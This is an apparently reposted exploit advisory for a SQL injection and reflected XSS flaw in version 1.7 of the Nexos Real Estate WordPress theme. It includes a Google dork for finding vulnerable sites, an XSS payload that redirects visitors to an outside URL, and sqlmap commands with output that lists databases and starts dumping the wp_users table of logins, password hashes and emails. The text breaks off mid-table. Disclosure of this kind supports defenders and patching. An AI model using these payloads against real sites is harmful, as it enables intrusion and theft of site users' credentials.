[webapps] WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection

4 years ago 216
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection # Google Dork: inurl:/wp-content/themes/nexos/ # Date: 2020-06-17 # Exploit Author: Vlad Vector # Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] # Software Version: 1.7 # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Tested on: Debian 10 # CVE: CVE-2020-15363, CVE-2020-15364 # CWE: CWE-79, CWE-89 ### [ Info: ] [i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: TARGET-DB Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+
Read Entire Article